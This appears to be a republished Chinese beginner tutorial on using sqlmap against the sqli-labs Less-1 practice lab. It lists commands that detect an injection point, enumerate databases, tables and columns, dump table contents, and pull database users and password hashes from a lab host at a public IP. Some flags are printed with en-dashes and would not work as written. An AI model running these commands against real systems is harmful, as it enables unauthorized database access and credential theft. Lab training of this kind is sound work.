系统城装机大师 - 固镇县祥瑞电脑科技销售部宣传站!

当前位置:首页 > 数据库 > MsSql > 详细页面

SQL注入之sqlmap入门学习

时间:2023-10-27来源:系统城装机大师作者:佚名

原来sql注入如此简单

以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。

一、判断是否存在注入点

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有图中白色背景的 则判断出有注入点

二、查询当前用户下所有数据库

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五个表

三、获取数据库中的表名

选取一个challenges数据库,获取此库的表名

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

四、获取表中的字段名

选取表T5M0QG6FM2,获取其中字段名

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、获取字段内容

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、获取数据库的所有用户

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用该命令就可以列出所有管理用户

七、获取数据库用户的密码

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、获取当前网站数据库的名称

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到当前的数据库是 security

九、获取当前网站数据库的用户名称

使用命令:

1 sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了

分享到:

相关信息

  • SQL Server 数据库中的收缩数据库和文件操作

    收缩数据文件通过将数据页从文件末尾移动到更靠近文件开头的未占用的空间来恢复空间,在文件末尾创建足够的空间后,可取消对文件末尾的数据页的分配并将它们返回给文件系统,本文给大家介绍SQL Server 数据库中的收缩数据...

    2023-10-27

  • dbeaver配置SQL server连接实现

    一、需要java jdk环境,我用的比较新 二、dbeaver新建连接SQL server...

    2023-10-27

系统教程栏目

栏目热门教程

人气教程排行

站长推荐

热门系统下载